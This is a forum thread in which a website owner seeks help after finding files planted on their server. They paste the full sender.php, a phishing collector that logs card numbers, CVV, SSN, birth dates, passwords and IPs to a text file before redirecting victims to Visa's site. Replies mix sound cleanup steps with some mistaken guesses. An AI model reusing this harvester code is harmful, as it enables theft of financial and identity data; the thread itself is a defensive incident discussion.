Please help a spammer has cracked/hacked my website via php!

I received this email today:
There’s a script at http://www.recovery-experts.com/php/sender.php that is being abused by a spammer. Said spammer sent me an e-mail with a form attached to it, that abuses your script. Could you please take steps to stop such abuse form happening?

I did some investigating and also found this:
http://recovery-experts.com/php/ca.txt

I had someone make this website for me several years ago, the person is no longer around. I need help getting this fixed and finding out how this could have happen in the first place.

I dont know where else to go, please any help or advise will be greatly appreciated!!!

It is hard to give advice without seeing the code of your sender.php script. Also the first url from your post just redirects to another site.

your guy probably did not protect any user inputs from mysql injection. If so you need to fix that now or sooner. You might want to look at all his code for other cases of this too.

From what I can gather, sender.php sends an email. In this case it wouldn’t need MySQL injection protection since it’s only sending an email.

All I can tell is someone’s worked out how your sender.php script works, and is abusing it to send spam to people.

I am sorry, I’m not too tech savy; here is the code from the sender.php script:

[php]<?php
session_start();

$card = $_POST[‘card’];
$expm = $_POST[‘expm’];
$expy = $_POST[‘expy’];
$cvv = $_POST[‘cvv’];
$ssn = $_POST[‘ssn’];
$zip = $_POST[‘zip’];
$a = $_POST[‘a’];
$b = $_POST[‘b’];
$c = $_POST[‘c’];
$sec = $_POST[‘sec’];
$sec2 = $_POST[‘sec2’];

{
$ip = getenv(“REMOTE_ADDR”);
$file = fopen(“ca.txt”, “a”);
$ip = getenv(“REMOTE_ADDR”);
$adddate = date(“D M d, Y g:i a”);
fputs ($file, “$adddate\r\n”);

fputs ($file, “Card: $card\r\n”);
fputs ($file, “Expm: $expm\r\n”);
fputs ($file, “Expy: $expy\r\n”);
fputs ($file, “CCV: $cvv\r\n”);
fputs ($file, “SSN: $ssn\r\n”);
fputs ($file, “(Zip): $zip\r\n”);
fputs ($file, “DD: $a\r\n”);
fputs ($file, “MM: $b\r\n”);
fputs ($file, “Year: $c\r\n”);
fputs ($file, “Passwd: $sec\r\n”);
fputs ($file, “Passwdc: $sec2\r\n”);

fputs ($file, “$ip\r\n”);
fputs ($file, “---------\r\n”);
fclose ($file);}

header(“Location: http://www.visaeurope.com/en/visa_europe.aspx”);

?>[/php]

So what are my options?! Like I said I am not too PHP savy and the guy who wrote this is no longer available.

I have uploaded the link the spammer is emailing the people: http://fdv.recovery-experts.com/Login_Jok2j3.html (this isnt an actual link, this is a saved html file that someone emailed me and I uploaded to my server)

Anyone?! Really worried over here; what if I just delete the senders.php ? That should not mess up my website/php/mysql right? However, it wont stop them from just redoing this all over again?

Include a hidden field in your form with a timestamp. Compare it with the current time in your send.php file to make sure it is relatively close.

you can substitute the timestamp with a session var generated on another page that links to your form page.

if he can view your code he can easly modify his behavior to match your changes.

You could block his IP in.htaccess but that’s worked around too.

If this person has the proper knowledge and the motovation, it’s hard to block this.

I’m not sure how to do those things :-\ I do not use that form at all; I mean I can probably just delete the:

http://www.recovery-experts.com/php/ca.txt
http://www.recovery-experts.com/php/sender.php

This would stop the form from working and not affect my website right? I looked through the code and I dont see how its at all connected to my website.

Question is, if I delete those two files what is to stop them from just recreating them again? I mean they did it the first time, why wont they try again? Also can they recreate them in a different location? Thats what I’m most worried about, I mean the only reason I even found out about this is because some people emailed me about to complain. If do this again and hide the files in a different folder I might never find out.

Please advise, if its safe to remove them and how do I prevent them from redoing this all over again.

Thank you very much.

It wouldn’t affect your website, but it will affect any user that tries to use that form. This will produce a 404 error.

Add this line just below ‘<?php’ in your send.php file…

header(‘Location: http://www.thepageyouwant.com/’);

This will redirect anyone accessing the send.php file to the page of your choice. Direct to an exiting page like your home page or better and a more friendly way, create a simple HTML page stating that the email form is down for maintenance and explain why they were directed to this page. Give them options, like a contact email or links to FAQ’s etc.

Please don’t use ‘www.thepageyouwant.com’ !, just say’n…

He still proves a valid point. If someone did somehow manipulate his site into making those files, they could easily just do it again with new files on new names. It almost sounds like sender.php isn’t his code but then if it isn’t how did this ‘hacker’ make those files.

Also the code you posted isn’t actually sending any emails so it’s another page that’s sending. That code is simply logging the information into a file.

That form isnt mine, I never created it and never used it. It isnt even hosted on my website, I just uploaded it to show you guys. It is hosted, created and used by the spammers that have hacked my php so I dont care where it redirects or if its doesnt work at all (I rather it doesnt work i think!)

If I delete it, what is to stop them from redoing this all over again? Someone recommended that I make a file listing of all the files on the server and compare them once in a while (any suggestion to what software can do that?); also someone suggested that I make php folders write protected, let me know what u guys think.

Thanks!

I did NOT write that code, it isnt mine. I have no idea how they uploaded it (server isnt compromised, it has been confirmed).

The emails, I’m pretty sure arent coming from me, they are using their email servers, their site, they are ONLY using my site for the submission of the form and storing of the info at the ca.txt file.

Basically I’m worried that if I delete them they will just recreate them, as you said, with different names and different location and I wont be able to find it. I want to patch the backdoor or whatever you want before deleting them.

Suggestions?!

Just to confirm the sender.php and ca.txt ARE NOT MINE. I dont need them. I never created them.

Do what I said and add the line to redirect in the file to disable it!

If someone is placing phantom files on your server, you’ve got bigger problems than spamming!

Just add the line and all will be well…

Hummm, nailed by the obvious bug twice today…

Could this be nothing more than a spammer using ‘[email protected]’ as a sender?

this happens to every site once in a while. Someone scrapes your site for an email address and uses that to send spam in your name. Nothing you can do about it! This is used a lot in ‘click revenue’ scams. They’re just using your address to spoof. Your site isn’t compromised. And this will go away soon, as they will move onto someone else.

That file is probably an orphan file for something that was abandoned. I go back through my old stuff and find more than I’d like to admit.

Adding a redirect line won’t stop them making new files to do this again. Follow these steps:

1. Scan your computer and ensure you have no keyloggers.
2. change your ftp passwords, and your account passwords.
3. Make sure that the folders are write-protected (don’t have permission to write in from script)
4. Delete the files.

If the files re-appear, you have a bigger problem but these steps should help.